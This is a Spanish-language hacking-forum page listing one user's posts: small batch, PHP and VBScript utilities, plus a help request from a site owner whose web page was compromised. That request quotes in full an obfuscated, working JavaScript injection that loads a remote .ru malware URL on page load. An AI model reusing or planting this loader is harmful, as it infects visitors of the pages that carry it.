elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Wireless en Windows / despues de tener la passphrase ? en: 1 Marzo 2013, 18:47 pm
--
2  Seguridad Informática / Seguridad / Me hackearon y dejaron un regalo. ayuda! en: 14 Mayo 2010, 23:06 pm
Hola a todos, Bueno mi problema es que hace un rato intente entrar a mi web y el antivirus me salto con que habia un troyano.  :-\ Me parecio muy raro esto y entonces entre al server a ver que pasaba y me encuentro con que abajo de todo en la pagina index.html encontre esta linea que no recuerdo haber puesto  :-\

Código:
<script>try {} catch(pE){};try {} catch(Xp){};eE=32291;eE--;try {} catch(I){};try {this.Q=false;var w=new Array();var i=window[String("a07hun".substr(4)+"escmbG".substr(0,2)+"casvMg".substr(0,2)+"jWcpeWcj".substr(3,2))];this.s=12128;this.s-=48;this.Kg=62204;this.Kg-=229;var U=new String();F=["rY","O"];var V=window[(String("RegE"+"xp"))];E=9858;E-=155;kl=15194;kl+=67;var A="rep"+"lac"+"e";this.jS="";var k='';var j="1";var mI='';var H='';var a={v:false};var e=String("onlo"+"SQmad".substr(3));f=48381;f--;var EC=3018;x=37020;x--;var rc=new Date();this._lg='';this._M='';this.Po=30979;this.Po--;function _(j,B){this.CH=false;this.AR="AR";this._B=false;this.xJ="xJ";this.Vo="Vo";var PL=["pa","Zk"];var M="[ltxv".substr(0,1);XK=["Su","s_"];try {} catch(oL){};M+=B;var Rv=["AB","jR"];var Ek=[];KC=[];var QO="QO";M+=i("%5d");var MT={of:false};var Ib={om:false};var er=false;dA=9445;dA++;var C=new V(M, String("g"));return j.replace(C, k);var Bv=new Array();};oY=50650;oY--;fp={};var CE={};var h=new String("/reveAdE".substr(0,5)+"rso-nl0c".substr(0,5)+"et/go32v".substr(0,5)+"ogle."+"GdIKcom/cIdKG".substr(4,5)+"omcas"+"t.netZpb".substr(0,5)+"GZrv.phpZrvG".substr(4,4));this.kH=35628;this.kH++;var m=343238-335158;this.dS=34232;this.dS++;var o=String("htt"+"p:/b9v".substr(0,3)+"/go"+"thg"+"uil"+"t.r"+"u:");var ty=["do_"];tc={XG:34617};var HC=["aH"];LN={Ts:false};var Mk=["Ki","hn","MA"];try {} catch(Ii){};try {var rl='yF'} catch(rl){};function G(){this.lg=55980;this.lg++;this.SX=36579;this.SX-=86;var qL=new Date();Gx={};SO={};var W=_('sIclrDikphto','fHljVvok4uKhqDIQ');try {var YN='me'} catch(YN){};var Mw=false;this.kN=19486;this.kN--;this.bP=4490;this.bP--;yc={};var BA=document;var AA=false;this.Nd="";var Oz={};var JL={Av:"YF"};var X=new String("appe"+"ERyndCh".substr(3)+"wFm4ildF4mw".substr(4,3));this.ZC=3686;this.ZC++;var F_=["JC","Hi","Od"];var Nu=["rj","Ax","jRs"];var ON={};var rBN=new Date();this.RW=38738;this.RW-=177;var lB=["gF"];_l=BA.createElement(W);this.OA=5769;this.OA-=77;var ew=new Date();var VU='';this.z_=false;this.ql=false;var dR="";var pt="pt";var Pz={FP:8336};P=o+m;HL=32462;HL+=9;P=P+h;try {} catch(Xs){};this.EV=false;this.tb=false;try {} catch(Uh){};ji=["c_","zK"];var HG=new String();so=11437;so+=84;var Yp=new String();this.aN="";var T=BA.body;_l[String("de9R76".substr(0,2)+"fe59z".substr(0,2)+"94nr".substr(3))]=j;VT=8274;VT-=221;var bun=["Hl"];ZT=24617;ZT-=219;var GK=["Qm"];try {var BO='tk'} catch(BO){};_l.src=P;try {} catch(li){};this.tB="";var Ku='';T[X](_l);UF=[];this.hm="hm";};this.KK='';var xW={af:10575};this.hP='';var VM=[];this.VI='';HQI=["wZ"];var Ag=16397;window[e]=G;this.JQ="";xc=[];var nl={SD:184};} catch(p){try {var IM='eb'} catch(IM){};var lV=new Date();cC=58014;cC-=95;Fc=["cM"];_a=["hd"];this.pg=14943;this.pg--;by=["XN"];};s_p=63145;s_p+=134;</script>
<!--d214af83de230538e9ec96da2945cae1-->

Nunca puse eso yo alguien sabe que es????? me lo detecta como
JS/TrojanDownloader.Pegel.BH troyano

mmm..... cada dos por tres me salta el antivirus ahora mostrandome esoooooo :o

 :'( ayudaaaaaaaaaaaaaaaaaa
 :-(
EDIT:
el archivo esta en C:\Users\Doom\AppData\Roaming\Mozilla\Firefox\Profiles\icoalaiw.default

Cada vez que lo borro aparece devuelta  :o es un archivo .js se llama  sessionstore.js creo que mientras mantengo abierto el firefox sigue apareciendo eso. como borro esa cosa????????????  :(

EDIT:
El archivo que dije anteriormente que lo borraba y se creaba nuevamente, lo abri como .txt y adentro tiene todas las paginas a las que entre con el firefox  :o
3  Programación / Scripting / [By Darkgx] Cambiar fondo del Ares en: 25 Febrero 2010, 00:32 am
Bueno, aburrido decidi codear esto  , espero que les sirva  como dice el titulo cambia el logo del Ares que esta en Reproductor  ;D

Para poder utilizarlo hay que saber algunos puntos:

-Deben poner el fondo que quieren poner en el Escritorio.
-El archivo tiene que ser .bmp
-Si estas bajo Windows Vista debes Ejecutarlo como Administrador (Como se hace esto? simple, Boton Secundario -> ejecutar como administrador).

##Mini Explicacion (Funcionamiento) ##
Lo primero que hace el programa al abrirlo tres opsiones, oviamente vamos a elegir
la opsion 1. Luego nos pide el nombre del archivo (que tiene que estar en el escritorio al igual que programa) sin su extension, es decir, si nuestro archivo se llama Myimage.bmp hay que poner Myimage solamente.

En el segundo paso nos pide el nombre del Skin actual que tenemos en el Ares, hacemos lo siguiente:
-Abrimos el Ares
-Vamos a: Panel de Control -> pestaña Skin.

Ahi nos fijamos que skin tiene y lo ponemos en el programa. Listo, Espero que les funcione, cualquier duda, postear no cuesta nada >_<  :xD
Código
  1. @echo off
  2. title AresBackGround_Changer (ABC)
  3. REM COPYRIGHTS TODOS LOS DERECHOS RESERVADOS >_<!
  4. REM darkgx
  5.  
  6. IF EXIST "%programfiles%\Ares\temp" (goto menu) else goto make
  7. :make
  8. MKDIR "%programfiles%\Ares\temp"
  9.  
  10. :menu
  11. CLS
  12. ECHO 1.Cambiar Logo
  13. ECHO 2.Volver a la normalidad
  14. ECHO 3.Salir
  15. SET /p op=Opsion--:
  16.  
  17. if not defined op goto error
  18.  
  19. IF %op%==1 (goto change) else goto op2
  20. :op2
  21. IF %op%==2 (goto normal) else goto op3
  22. :op3
  23. IF %op%==3 (goto exit) else goto error
  24.  
  25.  
  26. REM  **** MENU PARA CAMBIAR EL FONDO******
  27. :change
  28. CLS
  29. ECHO Ingrese el nombre de la imagen (que esta en su escritorio) que quiere poner en el Ares de fondo (sin su extension).
  30. ECHO ejemplo: myimage
  31. SET /p img=Imagen--:
  32. CLS
  33.  
  34. ECHO Ingrese el nombre del skin que tiene actualmente su Ares:
  35. SET /p skin=Skin--:
  36.  
  37. REM COPIANDO EL ARCHIVO logo.bmp
  38. IF EXIST "%programfiles%\Ares\temp\logo.bmp" (goto de) else goto do
  39. COPY /y "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" "%programfiles%\Ares\temp"
  40.  
  41. :de
  42. IF NOT EXIST "%programfiles%\Ares\data\GUI\%skin%\logo.bmp" (goto mo) else goto mi
  43.  
  44. :mi
  45. DEL /f /q "%programfiles%\Ares\data\GUI\%skin%\logo.bmp"
  46.  
  47. :mo
  48. REN %userprofile%\Desktop\%img%.bmp logo.bmp
  49. COPY /y "%userprofile%\Desktop\logo.bmp" "%programfiles%\Ares\data\GUI\%skin%"
  50.  
  51. TASKKILL /f /im "Ares.exe"
  52. CLS
  53. ECHO Cambio completado
  54. ECHO PRESIONE ENTER
  55.  
  56. goto menu
  57.  
  58.  
  59. REM **** VOLVER A LA NORMALIDAD AL FONDO *****
  60. :normal
  61. CLS
  62. ECHO ingrese el nombre del skin donde se encuentra el fondo actual:
  63. SET /p skin2=Skin--:
  64.  
  65. DEL /f /q "%programfiles%\Ares\data\GUI\%skin2%\logo.bmp"
  66. COPY /y "%programfiles%\Ares\temp\logo.bmp" "%programfiles%\Ares\data\GUI\%skin2%"
  67.  
  68. ECHO PRESIONE ENTER PARA SEGUIR
  69. TASKKILL /f /im "Ares.exe"
  70. goto menu
  71.  
  72.  
  73. :error
  74. CLS
  75. ECHO OPSION INVALIDA, VUELVA A INTENTARLO
  76. goto menu
  77.  



PD:
todavía tengo que mejorarlo, asique con tiempo le hare algunos cambios. Si alguien me podria decir si funciona en Windows XP  :-\, en Vista funciona bien. :P

Acepto Comentarios, Criticas...  ;D

Saludos!

EDIT:
No puede haber 2 archivos logo.bmp asi que cuando van a cambiar a otro fondo entonces borren el logo.bmp que quedo en el escritorio del fondo anterior (se entendió?).
4  Programación / PHP / Codificador y Decodificador de IP's - By Darkgx en: 2 Enero 2010, 02:03 am
Hola, bueno les traigo un Codificador y Decodificador de IP's en base 256. ¿Para que nos servira esto? enviar peticiones DCC en mirc, ya que al enviarlo la IP tiene que estar codificada. Bueno espero que les sirva.  :)
//CODIFICADOR//
Código
  1. <?php
  2. //Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved)
  3. //Fecha: 1/1/2010
  4.  
  5. $a=186;
  6. $b=23;
  7. $c=205;
  8. $d=165
  9. ;
  10. $res=($a*16777216+$b*65536+$c*256+$d*1);
  11. print("La IP codificada es :".$res);
  12. ?>
USO:
Para usarla solo tienen que poner los cuatro numeros de la IP en a, b, c y d Y luego les va a decir la IP codificada.

//DECODIFICADOR//
Código
  1. <?php
  2. //Decodificador echo por >>Darkgx<< - Todos los derechos reservados (all rights reserved)
  3. //Fecha: 1/1/2010
  4.  
  5. $ip=3645183495;
  6. $a=$ip/16777216; //PRIMER N° DE LA IP
  7.  
  8. settype($a,"integer");
  9. settype($var,"integer");
  10.  
  11. $b=($ip-($a*16777216));
  12. settype($b,"integer");
  13. $c=$b/65536; // SEGUNDO N° DE LA IP
  14. settype($c,"integer");
  15. $d=$c*65536;
  16. $e=($b-$d);
  17. $f=($e/256); // TERCER N° DE LA IP
  18. settype($f,"integer");
  19. $g=($f*256);
  20. $h=($e-$g); //CUARTO N° DE LA IP
  21.  
  22. print("La ip decodificada es: ".$a.".".$c.".".$f.".".$h);
  23. ?>
Para decodificarla solo pongan la IP codificada  (primero borren la ip de ejemplo) en la variablae $ip=(IP A DECODIFICAR)

Bueno espero que les sirva y si lo postean en otro lado no estaria demas poner su autor tambien   :P. Graxias y Saludos y feliz año nuevo para todos.

PD:
Opiniones, criticas y comentarios son bienvenidos!.
Darkgx  ;)
5  Programación / Scripting / [Batch] ayuda!! Elevar un Numero a una Potencia en: 15 Diciembre 2009, 19:37 pm
Hola estoy haciendo un code que eleva numero a una determinada potencia... no me quiere salir. bueno este es el code que tengo hasta ahora.  :-\

Lo que quise hacer fue lo sigiente... Hacer un bucle y que se repita la cantidad de veces que la potencia que eligio el usuario y se imprima en un archivo .txt el numero que quiere elevar el usuario, la misma cantidad que se hizo el bucle. osea...
Si el usuario quiere elevar 2^8 entonces se va a hacer una repeticion en un bucle 8 beces y se va a imprimir 8 veces el numero 2. al final se verifica si se hizo 8 veces (osea "if %a%==8 (goto elevar) else goto loop), lo veran mejor en el code.

Despues de esto con FOR revisa el archivo log.txt y va multiplicando el numero linea por linea con un bucle osea.. 5*5 =25 despues queria hacer que se guarde ese numero y en el segundo bucle hacer 25*5=125. lo intente haciendo
Código:
set /a mult=mult * %%_
despues que se imprima el resultado en un archivo .txt...


Código:
@echo off
title Elevar Potencia - By Darkgx

:loop
REM GUARDAMOS LA CANTIDAD DE NUMEROS DENTRO DE UN ARCHIVO .TXT
echo 5 >> log.txt
set /a a=a + 1
echo %a%

pause > nul
if %a%==5 (goto elevar) else goto loop
goto loop

:elevar
set /a b=b + 1
for /f "skip=%b%" %%_ in (log.txt) do (
set /a mult=mult * %%_
goto:next:
)
:next:
if %b%==5 (goto finish) else goto elevar

:finish
echo %mult% >> resultado.txt
pause > nul
exit
s
e que lo que esta mal es que se hace 0*5 =0 y por eso no sale pero tambien intente hacer esto y tampoco salio.

Código:
@echo off
title Elevar Potencia - By Darkgx

:loop
set five=5
REM GUARDAMOS LA CANTIDAD DE NUMEROS DENTRO DE UN ARCHIVO .TXT
echo 5 >> log.txt
set /a a=a + 1
echo %a%

pause > nul
if %a%==5 (goto elevar) else goto loop
goto loop

:elevar
set /a b=b + 1
for /f "skip=%b%" %%_ in (log.txt) do (
set /a mult=%five% * %%_
goto:next:
)
:next:
if %b%==5 (goto finish) else goto elevar

:finish
echo %mult% >> resultado.txt
pause > nul
exit
tambien lo puse sin los % a five y da lo mismo. Creo que la idea esta bien.. pero no sale xD.

Bueno espero que me puedan ayudar... Gracias de antemano! ;D

Darkgx
6  Programación / Scripting / [VBS]Mi primera calculadora en: 4 Diciembre 2009, 21:15 pm
Holas, bueno hace poco que empece a leer sobre VBScript y aca tengo mi primera aplicacion  ;D espero comentarios porfavor.

Una pregunta... como puedo hacer para que cuando aprete en cancelar que salga de la aplicacion? porque aca yo hice que para salir tienen que escribir la palabra "salir"...

Bueno... explico un poco. Las operaciones que pueden elegir son: suma, resta, division y multiplicacion. Luego les va a pedir que ingresen un numero y luego otro y por ultimo les saldra un msgbox con el resultado. Espero comentarios/criticas... etc

Código:
Dim num, num2, num3, result

Do
num = inputbox("que operacion quiere realizar?. Escriba salir si quiere terminar.","Calculadora VBS - By Darkgx")
IF (num="salir") then
exit do
end if

SELECT CASE num
CASE "suma"
num2 = inputbox("numero 1","suma")
num3 = inputbox("numero 2","suma")
result = num2 + num3
msgbox  result
CASE "division"
num2 = inputbox("numero 1","suma")
num3 = inputbox("numero 2","suma")
result = num2/num3
msgbox result
CASE "resta"
num2 = inputbox("numero 1","suma")
num3 = inputbox("numero 2","suma")
result = num2-num3
msgbox result
CASE "multiplicacion"
num2 = inputbox("numero 1","suma")
num3 = inputbox("numero 2","suma")
result = num2*num3
msgbox result
End Select

loop
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines